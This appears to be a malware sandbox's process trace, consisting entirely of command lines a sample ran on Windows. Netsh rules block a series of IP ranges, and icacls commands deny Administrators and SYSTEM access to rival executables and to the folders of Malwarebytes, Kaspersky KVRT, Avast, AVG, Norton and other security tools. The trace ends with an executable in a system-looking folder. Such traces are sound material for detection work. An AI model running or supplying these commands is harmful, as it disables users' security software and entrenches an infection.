C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\java.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\windows\svchost.exe /deny система:(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\java.exe /deny система:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\java.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\windows\svchost.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\windows\svchost.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\lsass.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\lsass.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\kz.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\kz.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\script.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\script.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\olly.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\olly.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\lsass2.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\boy.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\boy.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)

C:\ProgramData\WindowsTask\MicrosoftHost.exe

